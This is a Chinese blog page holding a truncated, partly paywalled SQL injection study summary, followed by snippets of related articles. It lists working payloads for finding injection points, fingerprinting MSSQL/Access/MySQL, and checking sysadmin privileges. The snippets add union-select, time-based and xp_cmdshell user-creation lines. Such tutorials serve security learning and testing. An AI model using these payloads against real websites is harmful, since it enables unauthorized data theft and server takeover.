SQL注入总结(部分,持续更新)

最新推荐文章于 2022-06-12 14:05:58 发布
最新推荐文章于 2022-06-12 14:05:58 发布
阅读量310 收藏 2
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41289254/article/details/95659399
版权

SQL注入

暑假无聊,想着整理一下学过的知识,总结一下常见的知识点,濒危下一步的学习打下基础,这是系列第一篇:SQL注入

1、SQL注入原理

SQL注入是因为过于信任用户,未对用户的输入进行过滤,攻击者可以通过将恶意的Sql查询或添加语句插入到应用的输入参数中,再在后台Sql服务器上解析执行,进行攻击

2、SQL注入流程

1、判断注入点及注入类型:

粗略型:提交单引号’

逻辑型(数字型注入):and 1=1/and 1=2

逻辑型(字符型注入):’ and ‘1’=‘1/’ and ‘1’='2

逻辑型(搜索型注入):%’ and 1=1 and ‘%’=’%/%’ and 1=2 and ‘%’=’%

2、简单判断数据库信息:

粗略型:

加单引号’(根据服务器报错的信息来判断)

加;–(;表示分离,-- 则是注释符,;和–MSSQL数据库有,ACCESS数据库没有)

逻辑型:

and user>0

and (select count(*) from msysobjects)>0 ……(页面错误为access数据库)

and (select count(*) from sysobjects)>0 ……(页面正常为MSSQL数据库)

and db_name()>0 ……(爆数据库名)

and version>0(爆SQLServer版本信息以及服务器操作系统的类型和版本信息)

判断MSSQL权限:

and 0<>(Select ISSRVROLEMEMBER(‘sysadmin’))–(页面正常则为SA)

and 0<>(Select IS_MEMBER(‘db_owner’))–(页面正常则为db_owner)

and 0<>(Select IS_MEMBER(‘public’))–(页面正常则是public)

注意:

以上方法适用于参数是int数字型的时候。

若为字符型,需在参数后添加单引号’并在查询语句后添加;–,搜索型注入以此类推。

判断MYSQL权限:

and ord(mid(user(),1,1))=114 /* (页面正常说明为root)

3、猜解数据库、数据库名、表名、字段名、字段内容

(1)mysql数据库:

假设注入点为?id=1

判断字段数:

order by方法: ?id=1 order by x-- 		(将x修改为1
最低0.47元/天 解锁文章
zwish
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入部分
农夫果园好好喝的博客
06-13 140
1.SQL注入介绍 SQL注入就是指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作 以php语句为例: $query =“select * from users where id = $_GET[id]; 2.SQL注入原理 SQL注入漏洞的产生需要满足一下两个条件。 1.参数用户可控:前端传给后端的参数内容是用户可以控制的 2.参数代入数据库查询:传入的参数拼接到SQL语句,并且带入数据
sql注入部分总结
qq_39345447的博客
06-22 173
SQL注入部分汇总
qq_48211311的博客
08-13 73
(适合于有一定基础的人群) 用\或者万能公式判断闭合 闭合方式:' " ') ") '))等 order by 或者直接猜有多少位 联合注入: 获取库名和表名 ?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+ 获取列名 ?id=-1' union select 1,database(),g...
SQL注入原理
雅戈洛夫的博客
05-28 551
title: SQL注入原理 date: 2021-4-29 tags: 渗透测试,CTF,SQL注入,基础 categories: 渗透测试 CTF SQL注入 基础 SQL注入原理 当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。 攻击者通过构造不同的sql语句来实现对数据库的任意操作。 SQL注入分类 按变量类型分: 数字型 字符型 按HTTP提交方式分: POST注入 GIT注入 Cookie注入注入方式分: 布尔注入 联合注入语句注入 报错注入 延时注入 .
Top10--SQL注入--进阶篇
weixin_45018333的博客
08-20 371
1.时间注入: 在这个页面中,不管我们输入什么就只能显示 you are in 说明不管我们输入的语句不管对不对就只显示这个字符串,无法判断任何信息,也没有回显,所以此时我们可以看一下页面的反应时间,来判断信息,就像Boolean注入一样。 输入: ’ and if(length(database())>1,sleep(5),1)–+ 不要忘记注释单引号 在火狐浏览器中F12,网络,查看页...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入知识点总结.pdf
02-11
根据网上视频课程学习总结知识点,文档结构分为SQL注入概述、SQL注入分类、SQL注入流程、SQL注入方法、自动化注入做出总结 整理为文档 可以方便查阅
防御SQL注入的方法总结
12-15
SQL 注入是一类危害极大的攻击形式。虽然危害很大,但是防御却远远没有XSS那么困难。 SQL 注入可以参见:https://en.wikipedia.org/wiki/SQL_injection SQL 注入漏洞存在的原因,就是拼接 SQL 参数。也就是将用于...
sql注入详解
m0_67392811的博客
06-12 5644
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
注入点的判断及猜解
热门推荐
冷风
06-27 1万+
注入点的判断及猜解本文由zoujialan贡献一、注入点的判断及猜解1.加入单引号 ’提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞。2.数字型判断是否有注入;语句:and 1=1 ;and 1=2 (经典)、' and '1'=1(字符型)结果:分别返回不同的页面,说明存在注入漏洞.分析:and 的意思是“和”如果没有过滤我们的语句,and 1=1就会被代入SQL查询语句进行查询,如果
常用SQL注入语句
蒋小龙的IT史
11-11 797
sql注入语句大全 --是否存在xp_cmdshell  and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')  --用xp_cmdshell执行命令  ;exec master..xp_cmdshell "net user name passwor
SQL注入基础知识
weixin_46555037的博客
10-03 1862
SQL注入基础知识 在owasp年度top 10 安全问题中,SQL注入高居榜首。SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 1.对于Web应用程序而言,用户核心数据存储在数据库中,例如MySQL、SQL server、Oracle 2.通过SQL注入攻击,可以获取、修改、删除数据库信息,并且通过提权来控制Web服务器等其他操作 3.
SQL注入学习总结
YouthBelief的博客
10-09 4568
SQL注入1.sql注入原理2.sql注入的分类3.sql注入可能出现的功能点4.判断是否存在sql注入Mysql注入中常用函数一、联合查询注入二、报错注入三、布尔盲注四、时间盲注五、堆叠注入六、json注入5.sql注入的绕过测试环境总结 1.sql注入原理 web程序未对用户输入的数据进行严格的检查和过滤就拼接到后台的sql语句中执行,从而被黑客利用进行数据库的增删查改或写入webshell。 2.sql注入的分类 根据数据类型分为:数字型、字符型、搜索型。 根据提交方式分为:get型 post型 c
SQL注入教程
weixin_51047454的博客
03-17 1万+
sql注入教程
2021-08-28培训web作业一sqli-labs
qq_45290991的博客
08-28 304
1-20的第4关联合注入 对于这个1-20关,不是说选一个吗?我选第4关:基于报错的双引号注入。 输入id=1’ 发现是”)闭合。 Where id = (“x”)? 我猜。然后看语句:果然!$result=mysql_query($sql);//返回查询的数据的一个结果集,需要用php相应的mysql函数取值。比如mysql_fetch_array()这个函数 会报错显示,并且限制一次回显行数。 不赘述。 5-19的第17关报错注入 班长说这个也是选一题,所以我选的是...
sql注入sql注入
最新发布
05-02
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。攻击者可以利用这个漏洞来绕过身份验证、获取敏感数据、修改数据或者执行其他恶意操作。 为了防止SQL注入攻击,开发人员应该采取以下措施: 1. 使用参数化查询或预编译语句:这样可以将用户输入的数据作为参数传递给SQL查询,而不是将其直接拼接到查询语句中。这样可以防止恶意代码的注入。 2. 输入验证和过滤:对用户输入进行验证和过滤,确保只接受符合预期格式的数据。例如,可以使用正则表达式验证输入是否符合特定的模式。 3. 最小权限原则:确保数据库用户只具有执行必要操作的最低权限。这样即使发生SQL注入攻击,攻击者也无法执行敏感操作。 4. 错误处理:不要向用户显示详细的错误信息,以防止攻击者获取有关数据库结构和配置的敏感信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值